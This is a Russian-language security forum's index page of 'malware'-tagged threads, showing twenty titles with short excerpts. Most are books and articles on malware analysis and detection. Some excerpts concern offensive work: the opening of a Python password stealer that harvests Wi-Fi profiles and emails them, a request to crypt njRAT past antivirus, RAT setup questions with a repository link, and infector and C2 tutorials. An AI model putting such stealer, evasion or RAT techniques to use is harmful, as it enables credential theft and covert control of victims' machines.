malware

  1. G

    Soft Стиллер паролей на python с отправкой на почту

    #!/usr/bin/python import smtplib import base64, os, sys, re import sqlite3 import socket import platform import uuid sender = '' reciever = '' password = '' # Dont change this marker = "Morwy" def wifipass(): def get_wlans(): data = os.popen("netsh wlan show profiles").read()...
  2. Zer0must2b

    Soft Софт Dangerzone: преобразователь потенциально опасных файлов

    Программа берет потенциально опасные PDF-файлы, офисные документы или изображения и конвертирует их в безопасный PDF-файл. Dangerzone работает следующим образом: вы даете ему документ, в котором не уверенны, можете ли вы ему доверять (например, вложение электронной почты). Внутри песочницы...
  3. H11

    Решено Есть ли вредонос на android устройстве.

    Доброго времени суток, однажды ко мне подошел товарищ и рассказал о своих подозрениях по поводу наличия малвари внутри его Android девайса. Попрошу не кидаться ссаными тряпками, а принять существующие условия - как должное.) 1. Девайс этому человеку подарен и менять он его не собирается. 2...
  4. Zer0must2b

    Гостевая статья Способы распаковать мобильное вредоносное ПО

    В этой статье кратко описываются методы распаковки мобильных вредоносных программ. Он будет сосредоточен на Anubis, так как это последнее популярное вредоносное ПО уже почти год. Актеры используют приложения-капельницы в качестве основного метода распространения. Дропперы находят свои пути в...
  5. SearcherSlava

    Книга Hacking exposed malware and rootkits 2020-02-03

    Author"s: Michael A. Davis.Sean M. Bodmer. Aaron LeMasters. Year: 2010 Publisher: The McGraw-Hill Format: PDF Pages: 401 Language: English ISBN: 978-0-07-159118-8 Defend against the ongoing wave of malware and rootkit assaults the failsafe Hacking Exposed way. Real-world case studies and...
  6. crew

    Статья Как обнаружить присутствие вредоносного кода в файле, если антивирус молчит

    В статье описаны начальные методы и техники выявления вредоносного кода в файлах, и в каких условиях стоит обследовать малварь. Первым делом что нам предстоит сделать, во избежание заражения инфраструктуры малварью это: Изолировать потенциально заражений ПК от других сетей Сделать дам...
  7. T

    Заплачу Исключить сайты из антивирусных баз, False positive

    Здравствуйте! конкуренты каким-то образом добавили наши сайты как фишинг в разные базы антивирусов,но сайты -чистые, на многие отправили письма о ложном включении,они оперативно исключили,но от bitdefender никакой реакции... отправляли false positive через официальную форму "URL Submit" с разных...
  8. S

    Решено Маскировка njrat (бэкдора)

    Добрый вечер. Подскажите пожалуйста, как закрпитовать njrat, чтобы антивирус не палил. Главное закриптовать так, чтобы AVG (аваст) не смог определить. Пробовал через c++, конечно это помогло, результат стал позитивней Изначально ситуация такая была То есть в каком-то роде это частично...
  9. S

    Проблема Как настроить порты в Njrat | AsyncRat

    Всем привет! Есть AsyncRat, аналог njrat. Прекрасно работает в одной сети, localhost. Но когда запускаешь на другом пк, попросту главная машина (атакующая) не видит атакуемую. Это скорее всего связано с тем, что задаю DNS 192.168.1.... - IPv4 Но мне нужно, чтобы атакуемая машина, могла...
  10. S

    Проблема Njrat0.7d как запустить?

    Доброй ночи. Скачал njrat c github https://github.com/malwares/Remote-Access-Trojan/tree/master/NJRAT Не знаю, как запустить builder, пробовал запускать Njrat0.7d.exe, ничего не происходит.
  11. SearcherSlava

    Книга Practical Malware Analysis 2019-07-30

    Author's: Michael Sikorski, Andrew Honig Year: 2012 Publisher: William Pollock Format: PDF Pages: 802 Language: English ISBN-10: 1-59327-290-1 ISBN-13: 978-1-59327-290-6 Malware analysis is big business, and attacks can cost a company dearly. When malware breaches your defenses, you need to...
  12. SearcherSlava

    Книга Rootkits and Bootkits: Reversing Modern Malware and Next Generation Threats 2019-07-30

    Author's: Alex Matrosov, Eugene Rodionov, Sergey Bratus Year: 2019 Publisher: William Pollock Format: PDF Pages: 450 Language: English ISBN-10: 1-59327-716-4 ISBN-13: 978-1-59327-716-1 About the Authors Alex Matrosov is a leading offensive security researcher at NVIDIA. He has more than two...
  13. SearcherSlava

    Книга Mastering Malware Analysis 2019-07-30

    Author's: Alexey Kleymenov, Amr Thabet Year: 2019 Publisher: Packt Publishing (June 6, 2019) Language: English Format: PDF Pages: 868 ISBN-10: 1789610788 ISBN-13: 978-1789610789 About the Author Alexey Kleymenov started working in the information security industry in his second year at...
  14. SearcherSlava

    Книга Computer Viruses and Malware 2019-07-30

    Author: John Aycock Year: 2006 Pages: 234 Format: PDF Publisher: Springer Language: English ISBN-13: 978-0-387-30236-2 ISBN-10: 0-387-30236-0 e-ISBN-13: 978-0-387-34188-0 e-ISBN-10: 0-387-34188-9 Our Internet-connected society increasingly relies on computers. As a result, attacks...
  15. Sunnych

    Статья TeamViewer encryption tvr.cfg или разбор конфигурации TeamSpy

    Уже не впервой хакеры используют для взлома и удаленного управления готовые программы, которые модернизируют для своих задач, раньше да и сейчас это: Radmin, DameWare, Omniquad Instant Remote Control, Remote Desktop Control, Remote Desktop Professional, Hidden Administrator, Activity Monitor...
  16. PingVinich

    Статья [0x07] Исследуем Portable EXEcutable [Пишем полноценный инфектор]

    Все статьи цикла Доброго времени суток, форумчане! Эта статья является логическим продолжением сразу для двух статей - для статьи о DLL инъекциях и для статьи об инфицировании .exe файлов. Только задумайтесь, что будет, если смешать два этих способа? (Для полноценного понимания требуется...
  17. PingVinich

    Статья [0x06] Исследуем Portable Executable [DLL инъекции]

    Все статьи цикла Салют, друзья! На дворе 2018 год, а мы с вами начинаем изучать DLL инъекции :). Не смотря на то, что эта техника уже много раз заезжена и всем известна, я всё же внесу свои 5 копеек, так как в будующих статьях мы будем частенько прибегать к этой технике и я просто не мог...
  18. Tayrus

    Статья Golem Malware - Малварь, который скрывается в шрифте windows

    Введение Подход "Living Off the Land" в хакинге заключается в выполнении вредоносных действий из легитимных бинарных файлов, уже установленных на конечной системе жертвы. Для передачи внешних файлов нет необходимости упаковывать дополнительное программное обеспечение в багаж полезной нагрузки...
  19. PingVinich

    Статья [0x05] Исследуем Portable Executable [Инфицируем .exe файлы]

    Все статьи цикла Доброго времени суток, друзья. В прошлых статьях, мы внимательно изучили строение и формат исполняемых файлов, а также закрепили эти знания на практике. Начиная с этой статьи мы начнём исследовать этот вопрос с практической точки зрения. Конкретно в этой статье мы напишем...
  20. Tayrus

    Статья [Python] Пишем динамический C2 сервер

    Приветствую всех! Недавно меня опять посетила идея. А что если сделать динамический C2 сервер, возможно ли это? Теперь давайте пройдемся по теории, C2 сервер - проще говоря это сервер для контроля малваря, например малварь стучит на этот сервер, получает задание и выполняет его на зараженной...